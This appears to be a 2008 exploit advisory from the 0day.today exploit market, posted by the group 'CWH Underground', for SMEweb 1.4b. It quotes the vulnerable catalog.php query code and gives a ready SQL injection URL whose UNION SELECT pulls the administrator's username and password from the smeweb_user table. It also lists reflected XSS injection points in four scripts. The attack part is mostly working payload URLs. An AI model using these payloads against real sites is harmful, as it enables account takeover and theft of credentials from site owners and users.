[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities

Author
CWH Underground
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3109
Category
web applications
Date add
01-06-2008
Platform
unsorted
=====================================================
SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities
=====================================================



=======================================================
 SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities
=======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 2 June 2008

#####################################################
 APPLICATION : SMEweb
 VERSION     : 1.4b
 VENDOR      : http://www.smethailand.com/ 
 DOWNLOAD    : http://www.geocities.com/smes_thailand/smeweb_v14b.zip
#####################################################

---SQL Injection Exploit---

##############################################
Vulnerable: catalog.php (Line:66-69)

if($idp)  
 $sql = "select * from ".$fix."catalog where idp='$idp' and category NOT IN ('L1','LA') ";
elseif($category)   	
 $sql = "select * from ".$fix."catalog where category='$category' order by idp desc limit  1";  

 $result = mysql_db_query($dbname,$sql);
###############################################

***It's Work with Magic_quote must turn off***

http://[target]/[path]/catalog.php?idp=1'union select 1,2,password,username,5,6,7,8 from smeweb_user where userid=1 ORDER BY counter/*


---Multiple Remote XSS Exploit---

[+]catalog.php
[+]search.php
[+]bb.php
[+]order.php

Example:
     
http://[target]/[path]/catalog.php?data=<XSS>
http://[target]/[path]/search.php?keyword=<XSS>
http://[target]/[path]/bb.php?page=<XSS>
http://[target]/[path]/order.php?new_s=<XSS>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################




#  0day.today [2024-09-28]  #